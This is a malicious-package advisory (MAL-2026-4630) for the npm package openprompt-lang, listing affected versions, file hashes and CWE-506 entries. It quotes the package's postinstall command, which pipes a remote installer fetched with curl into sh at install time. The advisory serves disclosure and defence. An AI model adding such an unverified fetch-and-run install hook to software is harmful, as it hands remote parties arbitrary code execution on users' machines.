MAL-2026-4630
See a problem?- Import Source
- https://github.com/ossf/malicious-packages/blob/main/osv/malicious/npm/openprompt-lang/MAL-2026-4630.json
- JSON Data
- https://api.osv.dev/v1/vulns/MAL-2026-4630
- Published
- 2026-05-23T23:03:36Z
- Modified
- 2026-05-26T06:02:45.461883444Z
- Summary
- Malicious code in openprompt-lang (npm)
- Details
-
-= Per source details. Do not edit below this line.=-
Source: amazon-inspector (2c9966d5fe1ab82b40fd24082c36cc9acf5677772768f75b30cda755d9cdd98f)
scripts/postinstall.js runs unconditionally during
npm install. When theopencodebinary is not on PATH (true for nearly every fresh install), it executesnpm install -g @opencode/cli 2>/dev/null || curl -fsSL https://opencode.ai/install.sh 2>/dev/null | sh. The curl-piped-to-sh fetches a mutable remote installer over the network and executes it with no hash or signature verification, no version pin, and from a third-party domain (opencode.ai) unrelated to the package publisher. The fallback also performs an unpinned global install of@opencode/cli, silently extending the installer's dependency surface beyond what is declared. The package's stated purpose is a CLI for AI-annotation/context engineering; auto-installing an unrelated third-party tool viacurl | shfrom a non-publisher domain at install time is outside that scope and gives whoever controls opencode.ai (now or in the future) arbitrary code execution on every machine that installs this package. - Database specific
{ "malicious-packages-origins": [ { "id": "IN-MAL-2026-004585", "versions": [ "1.3.0" ], "sha256": "0b3d3d4d116f031b0ac1d902eea51337d80a08e1885acc484d698ba38d2aabdb", "source": "amazon-inspector", "modified_time": "2026-05-25T05:35:48Z", "import_time": "2026-05-26T05:52:53.3295444Z" }, { "id": "IN-MAL-2026-004423", "versions": [ "1.2.6" ], "sha256": "19fb259f5df1648c36db4fa24dc1d050912e3fceabc8235316141e9febfe0b45", "source": "amazon-inspector", "modified_time": "2026-05-24T00:58:58Z", "import_time": "2026-05-26T05:52:34.289865541Z" }, { "id": "IN-MAL-2026-004422", "import_time": "2026-05-26T05:52:34.183494259Z", "sha256": "2c9966d5fe1ab82b40fd24082c36cc9acf5677772768f75b30cda755d9cdd98f", "source": "amazon-inspector", "modified_time": "2026-05-24T00:57:45Z", "versions": [ "1.2.6" ] }, { "id": "IN-MAL-2026-004449", "versions": [ "1.2.7" ], "sha256": "560085e8391d93e3f1c17bd78a1f3273b240f098442ab2f0414f1fb5cc2f6d3c", "source": "amazon-inspector", "modified_time": "2026-05-24T02:29:05Z", "import_time": "2026-05-26T05:52:37.338586987Z" }, { "id": "IN-MAL-2026-004414", "versions": [ "1.2.4" ], "sha256": "a127c4981cfea8a1be921c08b4ac3e915371041838d3981efc24ddc53b694a5d", "source": "amazon-inspector", "modified_time": "2026-05-24T00:38:07Z", "import_time": "2026-05-26T05:52:33.29493036Z" }, { "id": "IN-MAL-2026-004413", "versions": [ "1.2.4" ], "sha256": "a91abce6346f158c33db03696583627a1cf7f6805aa6b3f69afc85e0a32855d8", "source": "amazon-inspector", "modified_time": "2026-05-24T00:37:20Z", "import_time": "2026-05-26T05:52:33.159133434Z" }, { "id": "IN-MAL-2026-004409", "versions": [ "1.2.1" ], "sha256": "b90e8e14dd8b898c010517a81ca6e33ab98d90a514fd58d4457899c71120300a", "source": "amazon-inspector", "modified_time": "2026-05-24T00:14:52Z", "import_time": "2026-05-26T05:52:32.704275064Z" }, { "id": "IN-MAL-2026-004402", "import_time": "2026-05-26T05:52:31.667285387Z", "sha256": "e0a29910da10cc8d97c356e724ac483dff82a0c91225e3cdb868f1d160886d92", "source": "amazon-inspector", "modified_time": "2026-05-23T23:35:56Z", "versions": [ "1.2.0" ] }, { "id": "IN-MAL-2026-004408", "versions": [ "1.2.1" ], "sha256": "db2d671dd8a5cc56fe37c817c6f7a63f46f2692b858bf0ca2aa5edc34dbb15b0", "source": "amazon-inspector", "modified_time": "2026-05-24T00:13:43Z", "import_time": "2026-05-26T05:52:32.417343895Z" }, { "id": "IN-MAL-2026-004411", "versions": [ "1.2.2" ], "sha256": "29ec99421b46db9c46b09afbe1da0db595ab63584c54f31e04101739273ce992", "source": "amazon-inspector", "modified_time": "2026-05-24T00:22:56Z", "import_time": "2026-05-26T05:52:32.929380025Z" }, { "id": "IN-MAL-2026-004412", "import_time": "2026-05-26T05:52:33.028301822Z", "sha256": "4b78d9c204ace5f9ebde348fd931fb542ab85cd9297d0f4728fa904d5cb44a48", "source": "amazon-inspector", "modified_time": "2026-05-24T00:33:14Z", "versions": [ "1.2.3" ] }, { "id": "IN-MAL-2026-004448", "versions": [ "1.2.7" ], "sha256": "aba8dd892bd7521ed379e360d72bd0a09255a929e64e0d33a0cf76035e65da1c", "source": "amazon-inspector", "modified_time": "2026-05-24T02:27:50Z", "import_time": "2026-05-26T05:52:37.228436646Z" }, { "id": "IN-MAL-2026-004399", "versions": [ "1.1.0" ], "sha256": "b374a3566f692f636a236c0243da650b4db264f029477c431634bd805fca1626", "source": "amazon-inspector", "modified_time": "2026-05-23T23:03:36Z", "import_time": "2026-05-26T05:52:31.353973464Z" }, { "id": "IN-MAL-2026-004410", "versions": [ "1.2.2" ], "sha256": "e69c04ece59cfc2568d850cfc0e4554a9799196e29bdcfffbe61a04451714a0d", "source": "amazon-inspector", "modified_time": "2026-05-24T00:22:04Z", "import_time": "2026-05-26T05:52:32.799550433Z" }, { "id": "IN-MAL-2026-004586", "versions": [ "1.3.0" ], "sha256": "90498cc911c11219a4c19a0c864132e7e42de8e63f4f52b44360cd19d318e913", "source": "amazon-inspector", "modified_time": "2026-05-25T05:37:21Z", "import_time": "2026-05-26T05:52:53.518281193Z" }, { "id": "IN-MAL-2026-004400", "versions": [ "1.1.0" ], "sha256": "c559dde5b95604374665d3f852b7ad50ee78568e7a517a182496362838678e07", "source": "amazon-inspector", "modified_time": "2026-05-23T23:03:37Z", "import_time": "2026-05-26T05:52:31.4594297Z" }, { "id": "IN-MAL-2026-004404", "import_time": "2026-05-26T05:52:31.859851238Z", "sha256": "c9301d7c5a77059d6948110ed5ce20651c37b8df367db99f5f807496313fc33d", "source": "amazon-inspector", "modified_time": "2026-05-23T23:36:56Z", "versions": [ "1.2.0" ] } ] }- References
-
- https://www.npmjs.com/package/openprompt-lang/v/1.3.0
- https://www.npmjs.com/package/openprompt-lang/v/1.2.6
- https://www.npmjs.com/package/openprompt-lang/v/1.2.4
- https://www.npmjs.com/package/openprompt-lang/v/1.2.0
- https://www.npmjs.com/package/openprompt-lang/v/1.2.1
- https://www.npmjs.com/package/openprompt-lang/v/1.2.3
- https://www.npmjs.com/package/openprompt-lang/v/1.2.7
- https://www.npmjs.com/package/openprompt-lang/v/1.1.0
- https://www.npmjs.com/package/openprompt-lang/v/1.2.2
- Credits
-
-
- Amazon Inspector - FINDER
-
Affected packages
npm / openprompt-lang
Package
- Name
- openprompt-lang
- View open source insights on deps.dev
- Purl
- pkg:npm/openprompt-lang
Database specific
cwes
[
{
"description": "The product contains code that appears to be malicious in nature.",
"name": "Embedded Malicious Code",
"cweId": "CWE-506"
},
{
"cweId": "CWE-506",
"name": "Embedded Malicious Code",
"description": "The product contains code that appears to be malicious in nature."
},
{
"description": "The product contains code that appears to be malicious in nature.",
"name": "Embedded Malicious Code",
"cweId": "CWE-506"
},
{
"description": "The product contains code that appears to be malicious in nature.",
"name": "Embedded Malicious Code",
"cweId": "CWE-506"
},
{
"description": "The product contains code that appears to be malicious in nature.",
"name": "Embedded Malicious Code",
"cweId": "CWE-506"
},
{
"description": "The product contains code that appears to be malicious in nature.",
"name": "Embedded Malicious Code",
"cweId": "CWE-506"
},
{
"description": "The product contains code that appears to be malicious in nature.",
"name": "Embedded Malicious Code",
"cweId": "CWE-506"
},
{
"description": "The product contains code that appears to be malicious in nature.",
"name": "Embedded Malicious Code",
"cweId": "CWE-506"
},
{
"cweId": "CWE-506",
"name": "Embedded Malicious Code",
"description": "The product contains code that appears to be malicious in nature."
}
]
indicators
{
"evidence_files": [
{
"path": "scripts/postinstall.js",
"sha256": "2515e6c5a0ee46d25c8811e35e5e2679fcbe08cfb77b27f6e82c172165c19c58",
"tlsh": "4eb1e07692f801343f42c0ad3d1b1012b07a79637704f9987b9ebba95fcd82885622fd"
}
],
"package_integrity": [
{
"filename": "openprompt-lang-1.3.0.tgz",
"hashes": {
"sha512_sri": "sha512-AQgBNBhfzGND+x14tiAutREAWF1eSlEItVAth1S7e0RvwbRtSlMDF3Q4FYzXhtp+f7v6aaNn/w00htJUBgQm2A==",
"sha1": "d9b5efbc402ec6a1373b98740a72573274325873"
}
}
],
"domains": [
"34.9.16.104.in-addr.arpa"
]
}
source
"https://github.com/ossf/malicious-packages/blob/main/osv/malicious/npm/openprompt-lang/MAL-2026-4630.json"